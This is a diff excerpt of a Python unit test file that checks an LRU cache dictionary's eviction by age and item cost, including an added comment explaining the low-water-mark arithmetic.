227 242 self.assertEqual(d.popoldest(), ('a', 'va'))
228 243 self.assertEqual(len(d), 1)
229 244 self.assertEqual(d.totalcost, 5)
230 245 self.assertEqual(d.popoldest(), ('b', 'vb'))
231 246 self.assertEqual(len(d), 0)
232 247 self.assertEqual(d.totalcost, 0)
233 248 self.assertIsNone(d.popoldest())
234 249
235 250 d['a'] = 'va'
236 251 d['b'] = 'vb'
237 252 d['c'] = 'vc'
238 253 d['d'] = 'vd'
239 254
240 255 self.assertEqual(d.popoldest(), ('a', 'va'))
241 256 self.assertEqual(len(d), 3)
242 257 for key in ('b', 'c', 'd'):
243 258 self.assertEqual(d[key], 'v%s' % key)
244 259
245 260 d['a'] = 'va'
246 261 self.assertEqual(d.popoldest(), ('b', 'vb'))
247 262
248 263 def testmaxcost(self):
249 264 # Item cost is zero by default.
250 265 d = util.lrucachedict(6, maxcost=10)
251 266 d['a'] = 'va'
252 267 d['b'] = 'vb'
253 268 d['c'] = 'vc'
254 269 d['d'] = 'vd'
255 270 self.assertEqual(len(d), 4)
256 271 self.assertEqual(d.totalcost, 0)
257 272
258 273 d.clear()
259 274
260 275 # Inserting up to the exact cost threshold works without eviction.
261 276 d.insert('a', 'va', cost=6)
262 277 d.insert('b', 'vb', cost=4)
263 278
264 279 self.assertEqual(len(d), 2)
265 280 self.assertEqual(d['a'], 'va')
266 281 self.assertEqual(d['b'], 'vb')
267 282
268 283 # Inserting a new element with 0 cost works.
269 284 d['c'] = 'vc'
270 285 self.assertEqual(len(d), 3)
271 286
272 287 # Inserting a new element whose cost puts us above the high
273 288 # water mark evicts just the oldest item.
274 289 d.insert('d', 'vd', cost=1)
275 290 self.assertEqual(len(d), 3)
276 291 self.assertEqual(d.totalcost, 5)
277 292 self.assertNotIn('a', d)
278 293 for key in ('b', 'c', 'd'):
279 294 self.assertEqual(d[key], 'v%s' % key)
280 295
281 296 # Inserting a new element whose cost leaves room for only itself
282 297 # evicts all earlier items.
283 298 d.insert('e', 've', cost=10)
284 299 self.assertEqual(len(d), 1)
285 300 self.assertEqual(d.totalcost, 10)
286 301 self.assertIn('e', d)
287 302
288 303 # Inserting a new element with cost greater than the threshold
289 304 # still retains that item.
290 305 d.insert('f', 'vf', cost=11)
291 306 self.assertEqual(len(d), 1)
292 307 self.assertEqual(d.totalcost, 11)
293 308 self.assertIn('f', d)
294 309
295 310 # Inserting a new element will evict the remaining item since its
296 311 # cost exceeds the threshold.
297 312 d['g'] = 'vg'
298 313 self.assertEqual(len(d), 1)
299 314 self.assertEqual(d.totalcost, 0)
300 315 self.assertIn('g', d)
301 316
302 317 d.clear()
303 318
304 319 d.insert('a', 'va', cost=7)
305 320 d.insert('b', 'vb', cost=3)
306 321 self.assertEqual(len(d), 2)
307 322
308 323 # Replacing a value with smaller cost won't result in eviction.
309 324 d.insert('b', 'vb2', cost=2)
310 325 self.assertEqual(len(d), 2)
311 326
312 327 # Replacing a value with a higher cost will evict when the
313 328 # threshold is exceeded.
314 329 d.insert('b', 'vb3', cost=4)
315 330 self.assertEqual(len(d), 1)
316 331 self.assertNotIn('a', d)
317 332
318 333 def testmaxcostcomplex(self):
319 334 d = util.lrucachedict(100, maxcost=100)
320 335 d.insert('a', 'va', cost=9)
321 336 d.insert('b', 'vb', cost=21)
322 337 d.insert('c', 'vc', cost=7)
323 338 d.insert('d', 'vd', cost=50)
324 339 self.assertEqual(d.totalcost, 87)
325 340
326 341 # Inserting a new element should free multiple elements so we hit
327 342 # the low water mark.
328 343 d.insert('e', 've', cost=25)
329 344 self.assertEqual(len(d), 2)
330 345 self.assertNotIn('a', d)
331 346 self.assertNotIn('b', d)
332 347 self.assertNotIn('c', d)
333 348 self.assertIn('d', d)
334 349 self.assertIn('e', d)
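        # Explanatory note (not part of the original change): totalcost was
        # 87 and inserting 'e' (cost 25) pushed it to 112. Dropping 'a' (9)
        # and 'b' (21) alone would reach 82, already under maxcost 100, yet
        # 'c' is evicted too: eviction frees entries down to a low water
        # mark below the maxcost ceiling, leaving 50 + 25 = 75.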
335 350
336 351 if __name__ == '__main__':
337 352 silenttestrunner.main(__name__)